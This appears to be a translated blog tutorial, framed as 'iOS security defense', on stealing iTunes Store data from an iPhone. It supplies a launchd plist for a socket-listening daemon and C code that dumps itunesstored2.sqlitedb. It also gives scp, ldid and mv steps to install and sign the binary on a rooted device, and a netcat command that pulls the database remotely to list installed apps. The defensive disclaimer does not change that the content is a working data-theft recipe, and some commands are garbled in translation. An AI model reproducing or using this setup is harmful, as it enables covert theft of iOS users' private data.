IOS security defense (2): Background daemon illegal theft of user information about itunesstore

Background daemon illegally steals user information about itunesstore

I solemnly declare that I do not encourage the theft of user privacy and other behaviors. All hack learning is just to study how to defend. OK.

Auto-start

In IOS security defense (1): the Essential commands and tools for hack, this article describes how to compile your own C program and start it manually. Today, we will introduce how to enable the program to start automatically.

1. Open xcode to create a plist property file, as shown in:

Note that the communication service name is set to 55. Open it in the editor, that is:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Program</key><string>/usr/bin/ncdemo</string><key>StandardErrorPath</key><string>/dev/null</string><key>SessionCreate</key><true/><key>ProgramArguments</key><array><string>/usr/bin/ncdemo</string></array><key>inetdCompatibility</key><dict><key>Wait</key><false/></dict><key>Sockets</key><dict><key>Listeners</key><dict><key>SockServiceName</key><string>55</string></dict></dict></dict></plist>

Finally, SCP the plist file to the root@192.168.1.114:/system/library/launchdaemons.

Write the itunesstore database program

Read itunesstored2.sqlitedb information and output it to stdout for easy reading.

#include <stdio.h>#include <fcntl.h>#include <stdlib.h>#define FILE "/var/mobile/Library/com.apple.itunesstored/itunesstored2.sqlitedb"int main(){    int fd = open(FILE, O_RDONLY);    char buf[128];    int ret = 0;        if(fd < 0)        return -1;    while (( ret = read(fd, buf, sizeof(buf))) > 0){        write( fileno(stdout), buf, ret);    }    close(fd);    return 0;}

Compile, copy, and sign

1. The compilation method has been clearly described in the previous article. We will not repeat it here ...... % # Generate ncdemo running on ARM

2. Connect the ncdemo SCP to the device and log on to the device.

$ SCP ncdemo root@192.168.1.114: ncdemo

$ SSH root@192.168.1.114.

3. Signature

# Ldid-s ncdemo

# Mv ncdemo/usr/bin

Capture itunesstore data information

In this case, we only need to use Netcat to specify the previously defined service name and easily capture information about the itunesstore device locally.

$ NC 192.168.1.114 55> itunesstored2.sqlitedb

Analyze itunesstore data information

Okay. Here we will introduce the simplest application, which can be viewed using the string command:

$ Strings itunesstored2.sqlitedb

Therefore, we can see which apps are installed on iPhone/iPad devices:

Of course, you can do whatever you want ...... It's late at night. Write it here first ......